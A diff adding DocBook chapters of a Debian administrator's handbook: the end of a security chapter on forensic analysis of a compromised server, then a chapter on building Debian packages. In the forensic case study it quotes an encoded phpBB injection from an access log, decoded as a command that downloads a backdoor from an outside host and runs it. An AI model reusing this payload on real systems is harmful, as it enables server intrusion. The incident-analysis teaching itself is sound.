+      such as <command>dd</command>; these images can be sent to another
+      server (possibly with the very convenient <command>nc</command>
+      tool). Another possibility may be even simpler: just get the disk out
+      of the machine and replace it with a new one that can be reformatted
+      and reinstalled.</para>
+    </section>
+    <section>
+      <title>Re-installing</title>
+      <indexterm><primary>backdoor</primary></indexterm>
+
+      <para>The server should not be brought back on line without a
+      complete reinstallation. If the compromise was severe (if
+      administrative privileges were obtained), there is almost no other
+      way to be sure that we get rid of everything the attacker may have
+      left behind (particularly <emphasis>backdoors</emphasis>). Of course,
+      all the latest security updates must also be applied so as to plug
+      the vulnerability used by the attacker. Ideally, analyzing the attack
+      should point at this attack vector, so one can be sure of actually
+      fixing it; otherwise, one can only hope that the vulnerability was
+      one of those fixed by the updates.</para>
+
+      <para>Reinstalling a remote server is not always easy; it may involve
+      assistance from the hosting company, because not all such companies
+      provide automated reinstallation systems. Care should be taken not to
+      reinstall the machine from backups taken later than the compromise.
+      Ideally, only data should be restored, the actual software should be
+      reinstalled from the installation media.</para>
+    </section>
+    <section id="sect.forensic-analysis">
+      <title>Forensic Analysis</title>
+
+      <para>Now that the service has been restored, it is time to have a
+      closer look at the disk images of the compromised system in order to
+      understand the attack vector. When mounting these images, care should
+      be taken to use the <literal>ro,nodev,noexec,noatime</literal>
+      options so as to avoid changing the contents (including timestamps of
+      access to files) or running compromised programs by mistake.</para>
+
+      <para>Retracing an attack scenario usually involves looking for
+      everything that was modified and executed:</para>
+      <itemizedlist>
+        <listitem>
+	  <para><filename>.bash_history</filename> files often provide for
+	  a very interesting read;</para>
+        </listitem>
+        <listitem>
+	  <para>so does listing files that were recently created, modified
+	  or accessed;</para>
+        </listitem>
+        <listitem>
+	  <para>the <command>strings</command> command helps identifying
+	  programs installed by the attacker, by extracting text strings
+	  from a binary;</para>
+        </listitem>
+        <listitem>
+	  <para>the log files in <filename>/var/log/</filename> often allow
+	  reconstructing a chronology of events;</para>
+        </listitem>
+        <listitem>
+	  <para>special-purpose tools also allow restoring the contents of
+	  potentially deleted files, including log files that attackers
+	  often delete.</para>
+        </listitem>
+      </itemizedlist>
+
+      <para>
+        Some of these operations can be made easier with specialized
+        software. In particular, the <emphasis role="pkg">sleuthkit</emphasis>
+        package provides many tools to analyze a filesystem. Their use is
+        made easier by the <emphasis>Autopsy Forensic Browser</emphasis>
+        graphical interface (in the <emphasis role="pkg">autopsy</emphasis> package).
+      </para>
+      <indexterm><primary>Autopsy Forensic Browser</primary></indexterm>
+      <indexterm><primary>The Sleuth Kit</primary></indexterm>
+    </section>
+    <section id="sect.reconstituting-the-attack-scenario">
+      <title>Reconstituting the Attack Scenario</title>
+
+      <para>All the elements collected during the analysis should fit
+      together like pieces in a jigsaw puzzle; the creation of the first
+      suspect files is often correlated with logs proving the breach. A
+      real-world example should be more explicit than long theoretical
+      ramblings.</para>
+
+      <para>The following log is an extract from an Apache
+      <filename>access.log</filename>:</para>
+
+      <programlisting>
+www.falcot.com 200.58.141.84 - - [27/Nov/2004:13:33:34 +0100] "GET /phpbb/viewtopic.php?t=10&amp;highlight=%2527%252esystem(chr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr(32)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(103)%252echr(97)%252echr(98)%252echr(114)%252echr(121)%252echr(107)%252echr(46)%252echr(97)%252echr(108)%252echr(116)%252echr(101)%252echr(114)%252echr(118)%252echr(105)%252echr(115)%252echr(116)%252echr(97)%252echr(46)%252echr(111)%252echr(114)%252echr(103)%252echr(47)%252echr(98)%252echr(100)%252echr(32)%252echr(124)%252echr(124)%252echr(32)%252echr(99)%252echr(117)%252echr(114)%252echr(108)%252echr(32)%252echr(103)%252echr(97)%252echr(98)%252echr(114)%252echr(121)%252echr(107)%252echr(46)%252echr(97)%252echr(108)%252echr(116)%252echr(101)%252echr(114)%252echr(118)%252echr(105)%252echr(115)%252echr(116)%252echr(97)%252echr(46)%252echr(111)%252echr(114)%252echr(103)%252echr(47)%252echr(98)%252echr(100)%252echr(32)%252echr(45)%252echr(111)%252echr(32)%252echr(98)%252echr(100)%252echr(59)%252echr(32)%252echr(99)%252echr(104)%252echr(109)%252echr(111)%252echr(100)%252echr(32)%252echr(43)%252echr(120)%252echr(32)%252echr(98)%252echr(100)%252echr(59)%252echr(32)%252echr(46)%252echr(47)%252echr(98)%252echr(100)%252echr(32)%252echr(38))%252e%2527 HTTP/1.1" 200 27969 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
+      </programlisting>
+
+      <para>
+        This example matches exploitation of an old security
+        vulnerability in phpBB.
+        <ulink type="block" url="http://secunia.com/advisories/13239/" />
+        <ulink type="block" url="http://www.phpbb.com/phpBB/viewtopic.php?t=240636" />
+      </para>
+
+      <para>Decoding this long URL leads to understanding that the attacker
+      managed to run some PHP code, namely: <command>system("cd /tmp; wget
+      gabryk.altervista.org/bd || curl gabryk.altervista.org/bd -o bd;
+      chmod +x bd; ./bd &amp;")</command>. Indeed, a
+      <filename>bd</filename> file was found in <filename>/tmp/</filename>.
+      Running <command>strings /mnt/tmp/bd</command> returns, among other
+      strings, <literal>PsychoPhobia Backdoor is starting...</literal>.
+      This really looks like a backdoor.</para>
+
+      <para>Some time later, this access was used to download, install and
+      run an IRC <emphasis>bot</emphasis> that connected to an underground
+      IRC network. The bot could then be controlled via this protocol and
+      instructed to download files for sharing. This program even has its
+      own log file:</para>
+
+      <programlisting>** 2004-11-29-19:50:15: NOTICE: :GAB!sex@Rizon-2EDFBC28.pool8250.interbusiness.it NOTICE ReV|DivXNeW|504 :DCC Chat (82.50.72.202)
+** 2004-11-29-19:50:15: DCC CHAT attempt authorized from GAB!SEX@RIZON-2EDFBC28.POOL8250.INTERBUSINESS.IT
+** 2004-11-29-19:50:15: DCC CHAT received from GAB, attempting connection to 82.50.72.202:1024
+** 2004-11-29-19:50:15: DCC CHAT connection suceeded, authenticating
+** 2004-11-29-19:50:20: DCC CHAT Correct password
+(...)
+** 2004-11-29-19:50:49: DCC Send Accepted from ReV|DivXNeW|502: In.Ostaggio-iTa.Oper_-DvdScr.avi (713034KB)
+(...)
+** 2004-11-29-20:10:11: DCC Send Accepted from GAB: La_tela_dell_assassino.avi (666615KB)
+(...)
+** 2004-11-29-21:10:36: DCC Upload: Transfer Completed (666615 KB, 1 hr 24 sec, 183.9 KB/sec)
+(...)
+** 2004-11-29-22:18:57: DCC Upload: Transfer Completed (713034 KB, 2 hr 28 min 7 sec, 80.2 KB/sec)
+</programlisting>
+
+      <para>These traces show that two video files have been stored on the
+      server by way of the 82.50.72.202 IP address.</para>
+
+      <para>In parallel, the attacker also downloaded a pair of extra
+      files, <filename>/tmp/pt</filename> and
+      <filename>/tmp/loginx</filename>. Running these files through
+      <command>strings</command> leads to strings such as
+      <foreignphrase>Shellcode placed at 0x%08lx</foreignphrase> and
+      <foreignphrase>Now wait for suid shell...</foreignphrase>. These look
+      like programs exploiting local vulnerabilities to obtain
+      administrative privileges. Did they reach their target? In this case,
+      probably not, since no files seem to have been modified after the
+      initial breach.</para>
+
+      <para>In this example, the whole intrusion has been reconstructed,
+      and it can be deduced that the attacker has been able to take
+      advantage of the compromised system for about three days; but the
+      most important element in the analysis is that the vulnerability has
+      been identified, and the administrator can be sure that the new
+      installation really does fix the vulnerability.</para>
+    </section>
+  </section>
+</chapter>
diff --git a/tmp/cs-CZ/xml_tmp/15_debian-packaging.xml b/tmp/cs-CZ/xml_tmp/15_debian-packaging.xml
new file mode 100644
index 000000000..39b3ae81e
--- /dev/null
+++ b/tmp/cs-CZ/xml_tmp/15_debian-packaging.xml
@@ -0,0 +1,1111 @@
+<?xml version='1.0' encoding='utf-8' ?>
+<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.5//EN" "http://www.oasis-open.org/docbook/xml/4.5/docbookx.dtd" [
+]>
+<chapter id="debian-packaging">
+  <chapterinfo>
+    <mediaobject condition="pdf">
+      <imageobject>
+        <imagedata fileref="images/chap-debian-packaging.png" scalefit="1" />
+      </imageobject>
+    </mediaobject>
+    <keywordset>
+      <keyword>Backport</keyword>
+      <keyword>Rebuild</keyword>
+      <keyword>Source package</keyword>
+      <keyword>Archive</keyword>
+      <keyword>Meta-package</keyword>
+      <keyword>Debian Developer</keyword>
+      <keyword>Maintainer</keyword>
+    </keywordset>
+  </chapterinfo>
+  <title>Creating a Debian Package</title>
+  <highlights>
+    <para>It is quite common, for an administrator who has been handling
+    Debian packages in a regular fashion, to eventually feel the need to
+    create their own packages, or to modify an existing package. This
+    chapter aims to answer the most common questions in this field, and
+    provide the required elements to take advantage of the Debian
+    infrastructure in the best way. With any luck, after trying your hand
+    for local packages, you may even feel the need to go further than that
+    and join the Debian project itself!</para>
+  </highlights>
+  <section id="sect.rebuilding-package">
+    <title>Rebuilding a Package from its Sources</title>
+
+    <para>Rebuilding a binary package is required under several sets
+    of circumstances. In some cases, the administrator needs a
+    software feature that requires the software to be compiled from
+    sources, with a particular compilation option; in others, the
+    software as packaged in the installed version of Debian is not
+    recent enough. In the latter case, the administrator will usually
+    build a more recent package taken from a newer version of Debian —
+    such as <emphasis role="distribution">Testing</emphasis> or even
+    <emphasis role="distribution">Unstable</emphasis> — so that this
+    new package works in their <emphasis role="distribution">Stable</emphasis> distribution; this operation
+    is called “backporting”. As usual, care should be taken, before
+    undertaking such a task, to check whether it has been done
+    already — a quick look on the Debian Package Tracker for
+    that package will reveal that information.
+    <ulink type="block" url="https://tracker.debian.org/" />
+    <indexterm><primary>backport</primary></indexterm>
+    </para>
+    <section>
+      <title>Getting the Sources</title>
+
+      <para>Rebuilding a Debian package starts with getting its source
+      code. The easiest way is to use the <command>apt-get source
+      <replaceable>source-package-name</replaceable></command> command.
+      This command requires a <literal>deb-src</literal> line in the
+      <filename>/etc/apt/sources.list</filename> file, and up-to-date index
+      files (i.e. <command>apt-get update</command>). These conditions
+      should already be met if you followed the instructions from the
+      chapter dealing with APT configuration (see <xref linkend="sect.apt-sources.list" />). Note however, that you will be
+      downloading the source packages from the Debian version mentioned in
+      the <literal>deb-src</literal> line. If you need another version, you
+      may need to download it manually from a Debian mirror or from the web
+      site. This involves fetching two or three files (with extensions
+      <filename>*.dsc</filename> — for <emphasis>Debian Source
+      Control</emphasis> —
+      <filename>*.tar.<replaceable>comp</replaceable></filename>, and
+      sometimes <filename>*.diff.gz</filename> or
+      <filename>*.debian.tar.<replaceable>comp</replaceable></filename> —
+      <replaceable>comp</replaceable> taking one value among
+      <literal>gz</literal>, <literal>bz2</literal>
+      or <literal>xz</literal> depending on the
+      compression tool in use), then run the <command>dpkg-source -x
+      <replaceable>file.dsc</replaceable></command> command. If the
+      <filename>*.dsc</filename> file is directly accessible at a given
+      URL, there is an even simpler way to fetch it all, with the
+      <command>dget <replaceable>URL</replaceable></command> command. This
+      command (which can be found in the <emphasis role="pkg">devscripts</emphasis> package) fetches the
+      <filename>*.dsc</filename> file at the given address, then analyzes
+      its contents, and automatically fetches the file or files referenced
+      within. Once everything has been downloaded, it extracts the source
+      package (unless the <literal>-d</literal> or
+      <literal>--download-only</literal> option is used).</para>
+    </section>
+    <section>
+      <title>Making Changes</title>
+
+      <para>The source of the package is now available in a directory named
+      after the source package and its version (for instance,
+      <emphasis>samba-4.1.17+dfsg</emphasis>); this is where we'll work on our
+      local changes.</para>
+
+      <para>The first thing to do is to change the package version number,
+      so that the rebuilt packages can be distinguished from the original
+      packages provided by Debian. Assuming the current version is
+      <literal>2:4.1.17+dfsg-2</literal>, we can create version
+      <literal>2:4.1.17+dfsg-2falcot1</literal>, which clearly indicates the
+      origin of the package. This makes the package version number higher
+      than the one provided by Debian, so that the package will easily
+      install as an update to the original package. Such a change is best
+      effected with the <command>dch</command> command (<emphasis>Debian
+      CHangelog</emphasis>) from the <emphasis role="pkg">devscripts</emphasis> package, with an command such as
+      <command>dch --local falcot</command>. This invokes a
+      text editor (<command>sensible-editor</command> — this should be
+      your favorite editor if it is mentioned in the
+      <varname>VISUAL</varname> or <varname>EDITOR</varname> environment
+      variables, and the default editor otherwise) to allow documenting the
+      differences brought by this rebuild. This editor shows us that
+      <command>dch</command> really did change the
+      <filename>debian/changelog</filename> file.</para>
+
+      <para>When a change in build options is required, the changes
+      need to be made in <filename>debian/rules</filename>, which
+      drives the steps in the package build process. In the simplest
+      cases, the lines concerning the initial configuration
+      (<literal>./configure …</literal>) or the actual build
+      (<literal>$(MAKE) …</literal> or <literal>make …</literal>) are
+      easy to spot. If these commands are not explicitly called, they
+      are probably a side effect of another explicit command, in which
+      case please refer to their documentation to learn more about how
+      to change the default behavior. With packages using
+      <command>dh</command>, you might need to add an override
+      for the <command>dh_auto_configure</command> or
+      <command>dh_auto_build</command> commands (see their respective
+      manual pages for explanations on how to achieve this).</para>
+
+      <para>Depending on the local changes to the packages, an update may
+      also be required in the <filename>debian/control</filename> file,
+      which contains a description of the generated packages. In
+      particular, this file contains <literal>Build-Depends</literal> lines
+      controlling the list of dependencies that must be fulfilled at
+      package build time. These often refer to versions of packages
+      contained in the distribution the source package comes from, but
+      which may not be available in the distribution used for the rebuild.
+      There is no automated way to determine if a dependency is real or
+      only specified to guarantee that the build should only be attempted
+      with the latest version of a library — this is the only available
+      way to force an <emphasis>autobuilder</emphasis> to use a given
+      package version during build, which is why Debian maintainers
+      frequently use strictly versioned build-dependencies.</para>
+
+      <para>If you know for sure that these build-dependencies are too
+      strict, you should feel free to relax them locally. Reading the files
+      which document the standard way of building the software — these
+      files are often called <filename>INSTALL</filename> — will help you
+      figure out the appropriate dependencies. Ideally, all dependencies
+      should be satisfiable from the distribution used for the rebuild; if
+      they are not, a recursive process starts, whereby the packages
+      mentioned in the <literal>Build-Depends</literal> field must be
+      backported before the target package can be. Some packages may not
+      need backporting, and can be installed as-is during the build process
+      (a notable example is <emphasis role="pkg">debhelper</emphasis>).
+      Note that the backporting process can quickly become complex if you
+      are not careful. Therefore, backports should be kept to a strict
+      minimum when possible.</para>
+
+      <sidebar>
+        <title><emphasis>TIP</emphasis> Installing <literal>Build-Depends</literal></title>
+        <indexterm><primary><literal>Build-Depends</literal>, control field</primary></indexterm> 
+	<para><command>apt-get</command> allows
+	installing all packages mentioned in the
+	<literal>Build-Depends</literal> fields of a source package
+	available in a distribution mentioned in a
+	<literal>deb-src</literal> line of the
+	<filename>/etc/apt/sources.list</filename> file. This is a simple
+	matter of running the <command>apt-get build-dep
+	<replaceable>source-package</replaceable></command> command.</para>
+      </sidebar>
+    </section>
+    <section>
+      <title>Starting the Rebuild</title>
+
+      <para>When all the needed changes have been applied to the sources,
+      we can start generating the actual binary package
+      (<filename>.deb</filename> file). The whole process is managed by the
+      <command>dpkg-buildpackage</command> command.</para>
+
+      <example>
+        <title>Rebuilding a package</title>
+
+        <screen><computeroutput>$ </computeroutput><userinput>dpkg-buildpackage -us -uc
+</userinput><computeroutput>[...]
+</computeroutput></screen>
+      </example>
+
+      <sidebar id="sidebar.fakeroot">
+        <title><emphasis>TOOL</emphasis> <command>fakeroot</command></title>
+
+	<para>In essence, the package creation process is a simple matter
+	of gathering in an archive a set of existing (or built) files; most
+	of the files will end up being owned by <emphasis>root</emphasis>
+	in the archive. However, building the whole package under this user
+	would imply increased risks; fortunately, this can be avoided with
+	the <command>fakeroot</command> command. This tool can be used to
+	run a program and give it the impression that it runs as
+	<emphasis>root</emphasis> and creates files with arbitrary
+	ownership and permissions. When the program creates the archive
+	that will become the Debian package, it is tricked into creating an
+	archive containing files marked as belonging to arbitrary owners,
+	including <emphasis>root</emphasis>. This setup is so convenient
+	that <command>dpkg-buildpackage</command> uses
+	<command>fakeroot</command> by default when building
+	packages.</para>
+
+	<para>Note that the program is only tricked into “believing”
+	that it operates as a privileged account, and the process actually
+	runs as the user running <command>fakeroot
+	<replaceable>program</replaceable></command> (and the files are
+	actually created with that user's permissions). At no time does it
+	actually get root privileges that it could abuse.</para>
+      </sidebar>
+
+      <para>The previous command can fail if the
+      <literal>Build-Depends</literal> fields have not been updated, or if
+      the related packages are not installed. In such a case, it is
+      possible to overrule this check by passing the <literal>-d</literal>
+      option to <command>dpkg-buildpackage</command>. However, explicitly
+      ignoring these dependencies runs the risk of the build process
+      failing at a later stage. Worse, the package may seem to build
+      correctly but fail to run properly: some programs automatically
+      disable some of their features when a required library is not
+      available at build time.</para>
+
+      <para>More often than not, Debian developers use a higher-level
+      program such as <command>debuild</command>; this runs
+      <command>dpkg-buildpackage</command> as usual, but it also adds an
+      invocation of a program that runs many checks to validate the
+      generated package against the Debian policy. This script also cleans
+      up the environment so that local environment variables do not
+      “pollute” the package build. The <command>debuild</command>
+      command is one of the tools in the <emphasis>devscripts</emphasis>
+      suite, which share some consistency and configuration to make the
+      maintainers' task easier.</para>
+
+      <sidebar>
+        <title><emphasis>QUICK LOOK</emphasis> <command>pbuilder</command></title>
+        <indexterm><primary><command>pbuilder</command></primary></indexterm>
+
+	<para>The <command>pbuilder</command> program (in the similarly
+	named package) allows building a Debian package in a
+	<emphasis>chrooted</emphasis> environment. It first creates a
+	temporary directory containing the minimal system required for
+	building the package (including the packages mentioned in the
+	<emphasis>Build-Depends</emphasis> field). This directory is then
+	used as the root directory (<filename>/</filename>), using the
+	<command>chroot</command> command, during the build process.</para>
+
+	<para>This tool allows the build process to happen in an
+	environment that is not altered by users' manipulations. This also
+	allows for quick detection of the missing build-dependencies (since
+	the build will fail unless the appropriate dependencies are
+	documented). Finally, it allows building a package for a Debian
+	version that is not the one used by the system as a whole: the
+	machine can be using <emphasis role="distribution">Stable</emphasis> for its normal workload, and
+	a <command>pbuilder</command> running on the same machine can be
+	using <emphasis role="distribution">Unstable</emphasis> for package
+	builds.</para>
+      </sidebar>
+    </section>
+  </section>
+  <section id="sect.building-first-package">
+    <title>Building your First Package</title>
+    <section>
+      <title>Meta-Packages or Fake Packages</title>
+
+      <para>Fake packages and meta-packages are similar, in that they are
+      empty shells that only exist for the effects their meta-data have on
+      the package handling stack.</para>
+
+      <para>The purpose of a fake package is to trick
+      <command>dpkg</command> and <command>apt</command> into believing
+      that some package is installed even though it's only an empty shell.
+      This allows satisfying dependencies on a package when the
+      corresponding software was installed outside the scope of the
+      packaging system. Such a method works, but it should still be avoided
+      whenever possible, since there is no guarantee that the manually
+      installed software behaves exactly like the corresponding package
+      would and other packages depending on it would not work
+      properly.</para>
+
+      <para>On the other hand, a meta-package exists mostly as a collection
+      of dependencies, so that installing the meta-package will actually
+      bring in a set of other packages in a single step.</para>
+
+      <para>Both these kinds of packages can be created by the
+      <command>equivs-control</command> and <command>equivs-build</command>
+      commands (in the <emphasis role="pkg">equivs</emphasis> package). The
+      <command>equivs-control <replaceable>file</replaceable></command>
+      command creates a Debian package header file that should be edited to
+      contain the name of the expected package, its version number, the
+      name of the maintainer, its dependencies, and its description. Other
+      fields without a default value are optional and can be deleted. The
+      <literal>Copyright</literal>, <literal>Changelog</literal>,
+      <literal>Readme</literal> and <literal>Extra-Files</literal> fields
+      are not standard fields in Debian packages; they only make sense
+      within the scope of <command>equivs-build</command>, and they will
+      not be kept in the headers of the generated package.</para>
+
+      <example>
+        <title>Header file of the <emphasis>libxml-libxml-perl</emphasis> fake package</title>
+
+        <programlisting>
+Section: perl
+Priority: optional
+Standards-Version: 3.9.6
+
+Package: libxml-libxml-perl
+Version: 2.0116-1
+Maintainer: Raphael Hertzog &lt;hertzog@debian.org&gt;
+Depends: libxml2 (&gt;= 2.7.4)
+Architecture: all
+Description: Fake package - module manually installed in site_perl
+ This is a fake package to let the packaging system
+ believe that this Debian package is installed. 
+ .
+ In fact, the package is not installed since a newer version
+ of the module has been manually compiled &amp; installed in the
+ site_perl directory.
+</programlisting>
+      </example>
+
+      <para>The next step is to generate the Debian package with the
+      <command>equivs-build <replaceable>file</replaceable></command>
+      command. Voilà: the package is created in the current directory and
+      it can be handled like any other Debian package would.</para>
+    </section>
+    <section>
+      <title>Simple File Archive</title>
+
+      <para>The Falcot Corp administrators need to create a Debian package
+      in order to ease deployment of a set of documents on a large number
+      of machines. The administrator in charge of this task first reads the
+      “New Maintainer's Guide”, then starts working on their first
+      package. <ulink type="block" url="https://www.debian.org/doc/manuals/maint-guide/" /></para>
+
+      <para>The first step is creating a
+      <filename>falcot-data-1.0</filename> directory to contain the target
+      source package. The package will logically, be named
+      <literal>falcot-data</literal> and bear the <literal>1.0</literal>
+      version number. The administrator then places the document files in a
+      <filename>data</filename> subdirectory. Then they invoke the
+      <command>dh_make</command> command (from the <emphasis role="pkg">dh-make</emphasis> package) to add files required by the
+      package generation process, which will all be stored in a
+      <filename>debian</filename> subdirectory:</para>
+
+      <screen>
+<computeroutput>$ </computeroutput><userinput>cd falcot-data-1.0</userinput>
+<computeroutput>$ </computeroutput><userinput>dh_make --native</userinput>
+<computeroutput>
+Type of package: single binary, indep binary, multiple binary, library, kernel module, kernel patch?
+ [s/i/m/l/k/n] </computeroutput><userinput>i</userinput>
+<computeroutput>
+Maintainer name : Raphael Hertzog
+Email-Address   : hertzog@debian.org
+Date            : Fri, 04 Sep 2015 12:09:39 -0400
+Package Name    : falcot-data
+Version         : 1.0
+License         : gpl3
+Type of Package : Independent
+Hit &lt;enter&gt; to confirm:
+Currently there is no top level Makefile. This may require additional tuning.
+Done. Please edit the files in the debian/ subdirectory now. You should also
+check that the falcot-data Makefiles install into $DESTDIR and not in / .
+$</computeroutput>
+</screen>
+
+      <para>The selected type of package (<emphasis>indep
+      binary</emphasis>) indicates that this source package will generate a
+      single binary package that can be shared across all architectures
+      (<literal>Architecture: all</literal>). <emphasis>single
+      binary</emphasis> acts as a counterpart, and leads to a single binary
+      package that is dependent on the target architecture
+      (<literal>Architecture: any</literal>). In this case, the former
+      choice is more relevant since the package only contains documents and
+      no binary programs, so it can be used similarly on computers of all
+      architectures.</para>
+
+      <indexterm><primary>package types</primary></indexterm>
+      <indexterm><primary>package</primary><secondary>types</secondary></indexterm>
+
+      <para>The <emphasis>multiple binary</emphasis> type corresponds to a
+      source package leading to several binary packages. A particular case,
+      <emphasis>library</emphasis>, is useful for shared libraries, since
+      they need to follow strict packaging rules. In a similar fashion,
+      <emphasis>kernel module</emphasis> or <emphasis>kernel patch</emphasis>
+      should be restricted to packages containing kernel modules.
+      </para>
+
+      <sidebar>
+        <title><emphasis>TIP</emphasis> Maintainer's name and email address</title>
+
+	<para>Most of the programs involved in package maintenance will
+	look for your name and email address in the
+	<varname>DEBFULLNAME</varname> and <varname>DEBEMAIL</varname> or
+	<varname>EMAIL</varname> environment variables. Defining them once
+	and for all will avoid you having to type them multiple times. If
+	your usual shell is <command>bash</command>, it is a simple matter
+	of adding the following two lines in your
+	<filename>~/.bashrc</filename> file (you will obviously
+	replace the values with more relevant ones!):</para>
+
+        <programlisting>
+export EMAIL="hertzog@debian.org"
+export DEBFULLNAME="Raphael Hertzog"
+</programlisting>
+      </sidebar>
+
+      <para>The <command>dh_make</command> command created a
+      <filename>debian</filename> subdirectory with many files. Some
+      are required, in particular <filename>rules</filename>,
+      <filename>control</filename>, <filename>changelog</filename> and
+      <filename>copyright</filename>. Files with the
+      <filename>.ex</filename> extension are example files that can be
+      used by modifying them (and removing the extension) when
+      appropriate. When they are not needed, removing them is
+      recommended. The <filename>compat</filename> file should be
+      kept, since it is required for the correct functioning of the
+      <emphasis>debhelper</emphasis> suite of programs (all beginning
+      with the <command>dh_</command> prefix) used at various stages
+      of the package build process.</para>
+
+      <para>The <filename>copyright</filename> file must contain
+      information about the authors of the documents included in the
+      package, and the related license. In our case, these are internal
+      documents and their use is restricted to within the Falcot Corp
+      company. The default <filename>changelog</filename> file is generally
+      appropriate; replacing the “Initial release” with a more verbose
+      explanation and changing the distribution from
+      <literal>unstable</literal> to <literal>internal</literal> is enough.
+      The <filename>control</filename> file was also updated: the <literal>Section</literal> field
+      has been changed to <emphasis>misc</emphasis> and the
+      <literal>Homepage</literal>, <literal>Vcs-Git</literal> and
+      <literal>Vcs-Browser</literal> fields were removed. The
+      <literal>Depends</literal> fields was completed with
+      <literal>iceweasel | www-browser</literal> so as to ensure the
+      availability of a web browser able to display the documents in the
+      package.</para>
+
+      <example>
+        <title>The <filename>control</filename> file</title>
+
+        <programlisting>
+Source: falcot-data
+Section: misc
+Priority: optional
+Maintainer: Raphael Hertzog &lt;hertzog@debian.org&gt;
+Build-Depends: debhelper (&gt;= 9)
+Standards-Version: 3.9.5
+
+Package: falcot-data
+Architecture: all
+Depends: iceweasel | www-browser, ${misc:Depends}
+Description: Internal Falcot Corp Documentation
+ This package provides several documents describing the internal
+ structure at Falcot Corp.  This includes:
+  - organization diagram
+  - contacts for each department.
+ .
+ These documents MUST NOT leave the company.
+ Their use is INTERNAL ONLY.
+</programlisting>
+      </example>
+
+      <example>
+        <title>The <filename>changelog</filename> file</title>
+
+        <programlisting>
+falcot-data (1.0) internal; urgency=low
+
+  * Initial Release.
+  * Let's start with few documents:
+    - internal company structure;
+    - contacts for each department.
+
+ -- Raphael Hertzog &lt;hertzog@debian.org&gt;  Fri, 04 Sep 2015 12:09:39 -0400
+</programlisting>
+      </example>
+
+      <example>
+        <title>The <filename>copyright</filename> file</title>
+
+        <programlisting>
+Format: http://www.debian.org/doc/packaging-manuals/copyright-format/1.0/
+Upstream-Name: falcot-data
+
+Files: *
+Copyright: 2004-2015 Falcot Corp
+License: 
+ All rights reserved.
+</programlisting>
+      </example>
+
+      <sidebar>
+        <title><emphasis>BACK TO BASICS</emphasis> <filename>Makefile</filename> file</title>
+        <indexterm><primary><filename>Makefile</filename></primary></indexterm>
+
+	<para>A <filename>Makefile</filename> file is a script used by the
+	<command>make</command> program; it describes rules for how to
+	build a set of files from each other in a tree of dependencies (for
+	instance, a program can be built from a set of source files). The
+	<filename>Makefile</filename> file describes these rules in the
+	following format:</para>
+
+        <programlisting>
+target: source1 source2 ...
+        command1
+        command2
+</programlisting>
+
+	<para>The interpretation of such a rule is as follows: if one of
+	the <literal>source*</literal> files is more recent than the
+	<literal>target</literal> file, then the target needs to be
+	generated, using <command>command1</command> and
+	<command>command2</command>.</para>
+
+	<para>Note that the command lines must start with a tab character;
+	also note that when a command line starts with a dash character
+	(<literal>-</literal>), failure of the command does not interrupt
+	the whole process.</para>
+      </sidebar>
+
+      <para>The <filename>rules</filename> file usually contains a set of
+      rules used to configure, build and install the software in a
+      dedicated subdirectory (named after the generated binary package).
+      The contents of this subdirectory is then archived within the Debian
+      package as if it were the root of the filesystem. In our case, files
+      will be installed in the
+      <filename>debian/falcot-data/usr/share/falcot-data/</filename>
+      subdirectory, so that installing the generated package will deploy
+      the files under <filename>/usr/share/falcot-data/</filename>. The
+      <filename>rules</filename> file is used as a
+      <filename>Makefile</filename>, with a few standard targets (including
+      <literal>clean</literal> and <literal>binary</literal>, used
+      respectively to clean the source directory and generate the binary
+      package).</para>
+
+      <para>Although this file is the heart of the process, it increasingly
+      contains only the bare minimum for running a standard set of commands
+      provided by the <command>debhelper</command> tool. Such is the case
+      for files generated by <command>dh_make</command>. To install our
+      files, we simply configure the behavior of the
+      <command>dh_install</command> command by creating the following
+      <filename>debian/falcot-data.install</filename> file:</para>
+
+      <programlisting>
+data/* usr/share/falcot-data/
+</programlisting>
+
+      <para>At this point, the package can be created. We will however add
+      a lick of paint. Since the administrators want the documents to be
+      easily accessed from the menus of graphical desktop environments,
+      we add a <filename>falcot-data.desktop</filename> file and
+      get it installed in <filename>/usr/share/applications</filename>
+      by adding a second line to <filename>debian/falcot-data.install</filename>.
+      </para>
+
+      <example>
+        <title>The <filename>falcot-data.desktop</filename> file</title>
+
+        <programlisting>
+[Desktop Entry]
+Name=Internal Falcot Corp Documentation
+Comment=Starts a browser to read the documentation
+Exec=x-www-browser /usr/share/falcot-data/index.html
+Terminal=false
+Type=Application
+Categories=Documentation;
+</programlisting>
+      </example>
+
+      <para>The updated <filename>debian/falcot-data.install</filename> looks
+      like this:</para>
+      <programlisting>
+data/* usr/share/falcot-data/
+falcot-data.desktop usr/share/applications/
+</programlisting>
+
+      <para>Our source package is now ready. All that's left to do is to
+      generate the binary package, with the same method we used previously
+      for rebuilding packages: we run the <command>dpkg-buildpackage -us
+      -uc</command> command from within the
+      <filename>falcot-data-1.0</filename> directory.</para>
+    </section>
+  </section>
+  <section id="sect.setup-apt-package-repository">
+    <title>Creating a Package Repository for APT</title>
+    <indexterm><primary>package archive</primary></indexterm>
+    <indexterm><primary>package</primary><secondary>Debian</secondary><tertiary>archive of</tertiary></indexterm>
+
+    <para>Falcot Corp gradually started maintaining a number of Debian
+    packages either locally modified from existing packages or created from
+    scratch to distribute internal data and programs.</para>
+
+    <para>To make deployment easier, they want to integrate these packages
+    in a package archive that can be directly used by APT. For obvious
+    maintenance reasons, they wish to separate internal packages from
+    locally-rebuilt packages. The goal is for the matching entries in a
+    <filename>/etc/apt/sources.list.d/falcot.list</filename> file to be as
+    follows:</para>
+
+    <programlisting>
+deb http://packages.falcot.com/ updates/
+deb http://packages.falcot.com/ internal/
+</programlisting>
+    <indexterm><primary><command>mini-dinstall</command></primary></indexterm>
+
+    <para>The administrators therefore configure a virtual host on their
+    internal HTTP server, with <filename>/srv/vhosts/packages/</filename>
+    as the root of the associated web space. The management of the archive
+    itself is delegated to the <command>mini-dinstall</command> command
+    (in the similarly-named package). This tool keeps an eye on an
+    <filename>incoming/</filename> directory (in our case,
+    <filename>/srv/vhosts/packages/mini-dinstall/incoming/</filename>) and
+    waits for new packages there; when a package is uploaded, it is
+    installed into a Debian archive at
+    <filename>/srv/vhosts/packages/</filename>. The
+    <command>mini-dinstall</command> command reads the
+    <filename>*.changes</filename> file created when the Debian package is
+    generated. These files contain a list of all other files associated with
